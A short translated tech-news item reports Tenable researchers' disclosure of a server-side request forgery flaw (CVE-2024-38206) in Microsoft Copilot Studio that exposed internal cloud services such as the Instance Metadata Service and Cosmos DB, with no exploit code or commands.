news

Microsoft Copilot Studio AI tool security vulnerability revealed, leaking sensitive cloud data

2024-08-22

한어Русский языкEnglishFrançaisIndonesianSanskrit日本語DeutschPortuguêsΕλληνικάespañolItalianoSuomalainenLatina

IT Home reported on August 22 that technology media darkreading published a blog post yesterday (August 21), reporting that Microsoft Copilot Studio has a server-side request forgery (SSRF) security vulnerability that will leak sensitive cloud data.

Introduction to Microsoft Copilot Studio

IT Home attaches Microsoft's official introduction as follows:

Copilot Studio is an end-to-end conversational AI platform that lets you create and customize assistants using natural language or a graphical interface.

With Copilot Studio, users can easily design, test, and publish to meet the needs of internal or external scenarios.

Vulnerabilities

Researchers exploited a vulnerability in Microsoft's Copilot Studio tool to make external HTTP requests that could access sensitive information about internal services in cloud environments and potentially affect multiple tenants.

Researchers at Tenable discovered a server-side request forgery (SSRF) vulnerability in a chatbot creation tool that they exploited to access Microsoft's internal infrastructure, including the Instance Metadata Service (IMDS) and internal Cosmos DB instances.

The vulnerability is tracked by Microsoft as CVE-2024-38206, and according to the security bulletin associated with the vulnerability, an authenticated attacker can bypass SSRF protection in Microsoft Copilot Studio and leak sensitive cloud-based information over the network.